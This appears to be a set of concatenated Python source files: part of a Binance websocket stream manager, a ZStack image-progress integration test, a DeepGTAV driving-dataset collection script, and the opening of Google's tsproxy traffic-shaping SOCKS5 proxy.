'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ansi excape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
If you want to start a stream with a new config, its recommended, to first start a new stream with the new
settings and close the old stream not before the new stream received its first data. So your data will stay
consistent.
:param stream_id: id of the old stream
:type stream_id: uuid
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:return: new stream_id
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
:param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
"""
# starting a new socket and stop the old stream not before the new stream received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
def run(self):
"""
This method overloads `threading.run()` and starts management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks)
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams)
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
Is going to be the default user_address, once the websocket is created with this default value, its not possible
to change it. If you plan to use different user_address its recommended to not use this method! Just provide the
user_address with create_stream() in the market parameter.
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logger.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: uuid
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
Set how much received_last_second entries are stored till they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: uuid
"""
self.restart_requests[stream_id] = {'status': "new"}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
Sending more than 8000 chars via websocket.send() leads to a connection loss, 350 list elements is a good limit
to keep the payload length under 8000 chars and avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
:param max_items_per_request: max size for params, if more it gets splitted
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items > max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread, args=(host, port, warn_on_update))
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logger.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
# send signal to all threads
self.stop_manager_request = True
# delete listenKeys
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logger.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logger.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logger.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream can not heal itself in cause of wrong parameter (wrong market, channel type) it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logger.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report with this call their shutdowns
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logger.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=[], markets=[]):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logger.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logger.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
Unsubscribe channels and/or markets to an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
`How are the parameter `channels` and `markets` used with
`subscriptions <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
test_add_image_progress.py | '''
New Integration test for add image progress.
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
import apibinding.inventory as inventory
import threading
import os
import time
_config_ = {
'timeout' : 1800,
'noparallel' : True
}
new_image = None
def add_image(bs_uuid):
global new_image
image_option = test_util.ImageOption()
image_option.set_name('test_add_image_progress')
image_option.set_format('qcow2')
image_option.set_mediaType('RootVolumeTemplate')
image_option.set_url(os.environ.get('imageUrl_net'))
image_option.set_backup_storage_uuid_list([bs_uuid])
new_image = zstack_image_header.ZstackTestImage()
new_image.set_creation_option(image_option)
new_image.add_root_volume_template()
def test():
global new_image
bs_cond = res_ops.gen_query_conditions("status", '=', "Connected")
bss = res_ops.query_resource_fields(res_ops.BACKUP_STORAGE, bs_cond, \
None, fields=['uuid'])
if not bss:
test_util.test_skip("not find available backup storage. Skip test")
if bss[0].type != inventory.CEPH_BACKUP_STORAGE_TYPE:
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bss[0].type != inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
test_util.test_skip("not find available imagestore or ceph backup storage. Skip test")
thread = threading.Thread(target=add_image, args=(bss[0].uuid, ))
thread.start()
time.sleep(5)
image_cond = res_ops.gen_query_conditions("status", '=', "Downloading")
image = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['uuid'])
progress = res_ops.get_task_progress(image[0].uuid)
if int(progress.progress) < 0 or int(progress.progress) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.progress))
thread.join()
new_image.delete()
if test_lib.lib_get_image_delete_policy() != 'Direct':
new_image.expunge()
test_util.test_pass('Add image Progress Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global new_image
if new_image:
new_image.delete()
if test_lib.lib_get_image_delete_policy() != 'Direct':
new_image.expunge()
|
dataset_collect.py | import time
import requests
import multiprocessing
import numpy as np
from deepgtav.messages import Start, Stop, Scenario, Commands, frame2numpy, Dataset
from deepgtav.client import Client
import pickle
i = 100 # 设置数据集编号
set_time = 24 # 设置模拟器中的时间。24小时制
weather = 'EXTRASUNNY' # 设置模拟器中的天气。可以为雨天.....
location = [1243.9920654296875, -1186.1495361328125, 48.48838806152344] # 设置在模拟器中车辆的初始位置
left = total = right = 0
url = "https://www.pixeldesert.com/compare" # 设置远程遥控器的地址。
txt_position = "../state.config"
tongji_position = "tongji/"+str(i)+".txt" # 设置统计文件的位置。统计文件的作用是
CAP_IMG_W, CAP_IMG_H = 320, 240 # 设置要采集的数据集中图像的尺寸
rate = 10 # 设置图像采集的频率,即每秒钟采集多少组数据
client = None
scenario = None
dataset = Dataset(rate=10,
frame=[CAP_IMG_W,CAP_IMG_H],
throttle=True,
brake=True,
steering=True,
location=True,
drivingMode=True,
speed=True,
time=True)
def state():
while True:
response = requests.request("POST", url)
fo = open(txt_position, "w")
if response.text[1] == '0':
fo.write("0")
elif response.text[1] == '1':
fo.write("1")
fo.close()
time.sleep(2)
def drive():
global message
global left, right, total
message = client.recvMessage()
speed = message['speed']
steering = message['steering']
brake = message['brake']
location = message["location"]
total = total + 1
if steering > 0.1:
right = right+1
elif steering < -0.1:
left = left+1
print(str(speed)+", "+str(steering)+","+str(brake))
print(location)
def main():
global client, scenario
client = Client(ip='localhost', port=8000,datasetPath = 'D:/no_traffic/dataset' + str(i) + '.pz',compressionLevel=9)
scenario = Scenario(weather=weather, vehicle='blista', time=[set_time, 0], drivingMode=-1,
location=location) # 设置数据集存储位置,采集数据所用的车辆型号
client.sendMessage(Start(scenario=scenario, dataset=dataset))
print("load deepGTAV successfully! \nbegin")
while True:
fo = open(txt_position, "r") # 配置1
txt = fo.read()
fo.close()
if txt == '0':
tongji = open(tongji_position, "w+")
tongji.write("left:"+str(left)+" right:"+str(right)+" total:"+str(total))
tongji.close()
print('=====================end=====================')
exit(0)
elif txt == '1':
drive()
if __name__ == '__main__':
while True:
response = requests.request("POST", url)
if response.text[1] == '1':
fo = open(txt_position, "w")
fo.write("1")
fo.close()
print('$$$$$$$$$$$$$$$$$$$ after 3s will begin $$$$$$$$$$$$$$$$$$$')
i = 3
while i > 0:
print(i)
i = i - 1
time.sleep(1)
print('=====================start now!======================')
break
print("waiting for instructions...")
time.sleep(1)
p1 = multiprocessing.Process(target=state)
p2 = multiprocessing.Process(target=main)
p1.start()
p2.start()
|
tsproxy.py | #!/usr/bin/python
"""
Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncore
import gc
import logging
import platform
import Queue
import re
import signal
import socket
import sys
import threading
import time
server = None
in_pipe = None
out_pipe = None
must_exit = False
options = None
dest_addresses = None
connections = {}
dns_cache = {}
port_mappings = None
map_localhost = False
needs_flush = False
flush_pipes = False
last_activity = None
REMOVE_TCP_OVERHEAD = 1460.0 / 1500.0
lock = threading.Lock()
background_activity_count = 0
def PrintMessage(msg):
# Print the message to stdout & flush to make sure that the message is not
# buffered when tsproxy is run as a subprocess.
print >> sys.stdout, msg
sys.stdout.flush()
########################################################################################################################
# Traffic-shaping pipe (just passthrough for now)
########################################################################################################################
class TSPipe():
PIPE_IN = 0
PIPE_OUT = 1
def __init__(self, direction, latency, kbps):
self.direction = direction
self.latency = latency
self.kbps = kbps
self.queue = Queue.Queue()
self.last_tick = time.clock()
self.next_message = None
self.available_bytes = .0
self.peer = 'server'
if self.direction == self.PIPE_IN:
self.peer = 'client'
def SendMessage(self, message, main_thread = True):
global connections, in_pipe, out_pipe
message_sent = False
now = time.clock()
if message['message'] == 'closed':
message['time'] = now
else:
message['time'] = time.clock() + self.latency
message['size'] = .0
if 'data' in message:
message['size'] = float(len(message['data']))
try:
connection_id = message['connection']
# Send messages directly, bypassing the queues is throttling is disabled and we are on the main thread
if main_thread and connection_id in connections and self.peer in connections[connection_id]and self.latency == 0 and self.kbps == .0:
message_sent = self.SendPeerMessage(message)
except:
pass
if not message_sent:
try:
self.queue.put(message)
except:
pass
def SendPeerMessage(self, message):
global last_activity
last_activity = time.clock()
message_sent = False
connection_id = message['connection']
if connection_id in connections:
if self.peer in connections[connection_id]:
try:
connections[connection_id][self.peer].handle_message(message)
message_sent = True
except:
# Clean up any disconnected connections
try:
connections[connection_id]['server'].close()
except:
pass
try:
connections[connection_id]['client'].close()
except:
pass
del connections[connection_id]
return message_sent
def tick(self):
global connections
global flush_pipes
processed_messages = False
now = time.clock()
try:
if self.next_message is None:
self.next_message = self.queue.get_nowait()
# Accumulate bandwidth if an available packet/message was waiting since our last tick
if self.next_message is not None and self.kbps > .0 and self.next_message['time'] <= now:
elapsed = now - self.last_tick
accumulated_bytes = elapsed * self.kbps * 1000.0 / 8.0
self.available_bytes += accumulated_bytes
# process messages as long as the next message is sendable (latency or available bytes)
while (self.next_message is not None) and\
(flush_pipes or ((self.next_message['time'] <= now) and
(self.kbps <= .0 or self.next_message['size'] <= self.available_bytes))):
self.queue.task_done()
processed_messages = True
if self.kbps > .0:
self.available_bytes -= self.next_message['size']
self.SendPeerMessage(self.next_message)
self.next_message = None
self.next_message = self.queue.get_nowait()
except:
pass
# Only accumulate bytes while we have messages that are ready to send
if self.next_message is None or self.next_message['time'] > now:
self.available_bytes = .0
self.last_tick = now
return processed_messages
########################################################################################################################
# Threaded DNS resolver
########################################################################################################################
class AsyncDNS(threading.Thread):
def __init__(self, client_id, hostname, port, is_localhost, result_pipe):
threading.Thread.__init__(self)
self.hostname = hostname
self.port = port
self.client_id = client_id
self.is_localhost = is_localhost
self.result_pipe = result_pipe
def run(self):
global lock, background_activity_count
try:
logging.debug('[{0:d}] AsyncDNS - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
addresses = socket.getaddrinfo(self.hostname, self.port)
logging.info('[{0:d}] Resolving {1}:{2:d} Completed'.format(self.client_id, self.hostname, self.port))
except:
addresses = ()
logging.info('[{0:d}] Resolving {1}:{2:d} Failed'.format(self.client_id, self.hostname, self.port))
message = {'message': 'resolved', 'connection': self.client_id, 'addresses': addresses, 'localhost': self.is_localhost}
self.result_pipe.SendMessage(message, False)
lock.acquire()
if background_activity_count > 0:
background_activity_count -= 1
lock.release()
# open and close a local socket which will interrupt the long polling loop to process the message
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# TCP Client
########################################################################################################################
class TCPConnection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_IDLE = 0
STATE_RESOLVING = 1
STATE_CONNECTING = 2
STATE_CONNECTED = 3
def __init__(self, client_id):
global options
asyncore.dispatcher.__init__(self)
self.client_id = client_id
self.state = self.STATE_IDLE
self.buffer = ''
self.addr = None
self.dns_thread = None
self.hostname = None
self.port = None
self.needs_config = True
self.needs_close = False
self.did_resolve = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
in_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']):
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolve':
self.HandleResolve(message)
elif message['message'] == 'connect':
self.HandleConnect(message)
elif message['message'] == 'closed':
if len(self.buffer) == 0:
self.handle_close()
else:
self.needs_close = True
def handle_error(self):
logging.warning('[{0:d}] Error'.format(self.client_id))
if self.state == self.STATE_CONNECTING:
self.SendMessage('connected', {'success': False, 'address': self.addr})
def handle_close(self):
logging.info('[{0:d}] Server Connection Closed'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'server' in connections[self.client_id]:
del connections[self.client_id]['server']
if 'client' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
except:
pass
def handle_connect(self):
if self.state == self.STATE_CONNECTING:
self.state = self.STATE_CONNECTED
self.SendMessage('connected', {'success': True, 'address': self.addr})
logging.info('[{0:d}] Connected'.format(self.client_id))
self.handle_write()
def writable(self):
if self.state == self.STATE_CONNECTING:
return True
return len(self.buffer) > 0
def handle_write(self):
if self.needs_config:
self.needs_config = False
self.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] TCP => {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
self.needs_close = False
self.handle_close()
def handle_read(self):
try:
while True:
data = self.recv(1460)
if data:
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] TCP <= {1:d} byte(s)'.format(self.client_id, len(data)))
self.SendMessage('data', {'data': data})
else:
return
except:
pass
def HandleResolve(self, message):
global in_pipe, map_localhost, lock, background_activity_count
self.did_resolve = True
is_localhost = False
if 'hostname' in message:
self.hostname = message['hostname']
self.port = 0
if 'port' in message:
self.port = message['port']
logging.info('[{0:d}] Resolving {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
if self.hostname == 'localhost':
self.hostname = '127.0.0.1'
if self.hostname == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
logging.info('[{0:d}] Resolving {1}:{2:d} to mapped address {3}'.format(self.client_id, self.hostname, self.port, dest_addresses))
self.SendMessage('resolved', {'addresses': dest_addresses, 'localhost': False})
else:
lock.acquire()
background_activity_count += 1
lock.release()
self.state = self.STATE_RESOLVING
self.dns_thread = AsyncDNS(self.client_id, self.hostname, self.port, is_localhost, in_pipe)
self.dns_thread.start()
def HandleConnect(self, message):
global map_localhost
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
is_localhost = False
if 'localhost' in message:
is_localhost = message['localhost']
elif not self.did_resolve and message['addresses'][0] == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
self.addr = dest_addresses[0]
else:
self.addr = message['addresses'][0]
self.create_socket(self.addr[0], socket.SOCK_STREAM)
addr = self.addr[4][0]
if not is_localhost or map_localhost:
port = GetDestPort(message['port'])
else:
port = message['port']
logging.info('[{0:d}] Connecting to {1}:{2:d}'.format(self.client_id, addr, port))
self.connect((addr, port))
########################################################################################################################
# Socks5 Server
########################################################################################################################
class Socks5Server(asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#self.set_reuse_addr()
self.bind((host, port))
self.listen(socket.SOMAXCONN)
self.ipaddr, self.port = self.getsockname()
self.current_client_id = 0
except:
PrintMessage("Unable to listen on {0}:{1}. Is the port already in use?".format(host, port))
exit(1)
def handle_accept(self):
global connections
pair = self.accept()
if pair is not None:
sock, addr = pair
self.current_client_id += 1
logging.info('[{0:d}] Incoming connection from {1}'.format(self.current_client_id, repr(addr)))
connections[self.current_client_id] = {
'client' : Socks5Connection(sock, self.current_client_id),
'server' : None
}
# Socks5 reference: https://en.wikipedia.org/wiki/SOCKS#SOCKS5
class Socks5Connection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_WAITING_FOR_HANDSHAKE = 0
STATE_WAITING_FOR_CONNECT_REQUEST = 1
STATE_RESOLVING = 2
STATE_CONNECTING = 3
STATE_CONNECTED = 4
def __init__(self, connected_socket, client_id):
global options
asyncore.dispatcher.__init__(self, connected_socket)
self.client_id = client_id
self.state = self.STATE_WAITING_FOR_HANDSHAKE
self.ip = None
self.addresses = None
self.hostname = None
self.port = None
self.requested_address = None
self.buffer = ''
self.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
self.needs_close = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
out_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']) > 0:
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolved':
self.HandleResolved(message)
elif message['message'] == 'connected':
self.HandleConnected(message)
self.handle_write()
elif message['message'] == 'closed':
if len(self.buffer) == 0:
